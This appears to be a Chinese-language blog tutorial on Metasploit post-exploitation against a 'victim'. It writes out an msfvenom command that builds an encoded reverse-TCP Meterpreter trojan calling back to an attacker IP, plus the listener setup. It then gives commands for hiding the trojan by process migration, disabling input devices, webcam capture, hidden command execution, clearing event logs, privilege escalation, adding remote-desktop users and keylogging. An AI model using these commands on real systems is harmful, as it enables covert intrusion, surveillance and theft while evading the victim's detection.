在利用msf進行滲透測試時,或者我們將我們自己的木馬發送給受害者時,由於我們的木馬是臨時性的,不能很好的保持持久在線,導致滲透過程失敗。那么我們該如何解決這一問題呢!其實方法也很簡單,我們只需要將木馬的進程轉移到其他的程序上即可。這樣做一來是防止受害者發現可疑進程而關閉后門程序,二是可以有效的保持木馬在線。
首先我們生成一個木馬
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=192.168.232.195 lport=55555 -f exe > haya.exe
啟動msfconsole並設置參數
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.195
set LPORT 5555
exploit
運行軟件,成功獲得shell
轉移進程
首先命令ps
查看當前windows下運行的進程有哪些。
這時,我們要記錄下要轉移程序的pid
值
比如,我想我木馬的進程轉移到txt
文檔程序下。執行下面命令。
migrate 6296
uictl開關鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/鼠標
uictl disable mouse #禁用鼠標
uictl disable keyboard #禁用鍵盤
網絡攝像頭攝像頭命令
webcam_list #查看攝像頭
webcam_snap #通過攝像頭拍照
webcam_stream #通過攝像頭開啟視頻
執行執行文件
execute #在目標機中執行文件
execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互
遷移進程遷移
getpid # 獲取當前進程的pid
ps # 查看當前活躍進程
migrate <pid值> #將Meterpreter會話移植到指定pid值進程中
kill <pid值> #殺死進程
清除日志
clearav #清除windows中的應用程序日志、系統日志、安全日志
getsystem提權
getsystem
遠程桌面及截屏
enumdesktops #查看可用的桌面
getdesktop #獲取當前meterpreter 關聯的桌面
set_desktop #設置meterpreter關聯的桌面 -h查看幫助
screenshot #截屏
use espia #或者使用espia模塊截屏 然后輸入screengrab
run vnc #使用vnc遠程桌面連接
getgui命令
run getgui –h #查看幫助
run getgui -e #開啟遠程桌面
run getgui -u lltest2 -p 123456 #添加用戶
run getgui -f 6661 –e #3389端口轉發到6661
鍵盤記錄
keyscan_start #開始鍵盤記錄
keyscan_dump #導出記錄數據
keyscan_stop #結束鍵盤記錄